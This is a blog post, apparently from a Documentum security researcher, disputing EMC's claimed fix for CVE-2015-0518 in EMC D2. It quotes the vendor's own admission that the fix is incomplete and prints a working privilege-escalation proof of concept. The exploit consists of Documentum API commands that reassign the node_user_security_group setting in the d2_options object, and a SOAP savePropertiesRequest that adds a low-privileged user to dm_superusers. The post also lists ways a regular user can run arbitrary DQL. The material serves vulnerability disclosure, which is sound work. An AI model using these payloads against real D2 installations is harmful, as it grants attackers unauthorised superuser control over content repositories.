CVE-2015-0518. Was it really fixed?

Three weeks ago EMC announced CVE-2015-0518:

A method in the Properties service of the D2FS web service component may allow a low privileged D2 user to manipulate group permissions and obtain superuser privileges.

You can find related PoC in Second dive into D2 security. This vulnerability is also mentioned in CERT’s spreadsheet. If you were lucky and were able to download the first version of CERT’s spreadsheet (otherwise you can find it here) you can find following EMC’s comment about this vulnerability:

It appears that the fixed releases communicated for this issue were incorrect. This has not been fixed because the vulnerability described in PSRC-2105 (D2 configuration objects not being protected with ACLs) on which it relies has not been fixed yet. However, fixing the latter will be a major undertaking and it has been decided by D2 Product Management that it will not be fixed in the next release of D2 (currently versioned as 4.2.1) scheduled GA in 2015 Q2 due to resource constraints. The remediation plan here then is to fix PSRC-2105 in 2015 after the upcoming D2 4.2.1 release.

So, besides that D2 actively uses docbase methods (which is insecure, unreliable, etc) it also does not protect its config objects from editing by regular user – I bet such weird implementation was caused by misleading performance tips from EMC:

What really happened in CVE-2015-0518? EMC fixed a PoC described in Second dive into D2 security, “new” (the previous one just truncated value of node_admin_security_group attribute in d2_options object) PoC is:

api:

API> retrieve,c,d2_options
...
000224838000012c
API> dump,c,l
...
USER ATTRIBUTES

...

  node_admin_security_group       : admingroup

...

API> set,c,l,node_user_security_group
SET> <any group attacker belongs to>
...
OK
API>
save,c,l
...
OK

soap:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
           xmlns:con="http://www.emc.com/d2fs/services/content_service"
           xmlns:com="http://www.emc.com/d2fs/models/common"
           xmlns:prop="http://www.emc.com/d2fs/services/property_service" 
           xmlns:att="http://www.emc.com/d2fs/models/attribute"
           xmlns:con1="http://www.emc.com/d2fs/models/context">
   <soapenv:Header/>
   <soapenv:Body>
      <prop:savePropertiesRequest com:id="1102248380000541" >
         <con1:context uid="2" login="hacker" password="hacker">
                <con1:repository com:id="2" repositoryName="d2" serverVersion="7"
                                 repositoryType="DOCUMENTUM" hideDomain="true"/>
            </con1:context>
         <!--Zero or more repetitions:-->
         <att:attributes name="list" type="2" value="group_membership" />
         <att:attributes name="user_group_name" type="2" value="dm_superusers" />
      </prop:savePropertiesRequest>
   </soapenv:Body>
</soapenv:Envelope>

Actually, you may ask how regular user can modify docbase object in D2 which is not exposed through D2 interface, possible options are:

  • through direct connection to Content Server, if available
  • through DFS, if available
  • through WDK application – DQL editor is not the only option to execute DQL query in WDK applications
  • through D2-Config – it has GetData servlet, which allows to execute arbitrary DQL query

One thought on “CVE-2015-0518. Was it really fixed?

  1. Pingback: D2 4.6 | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s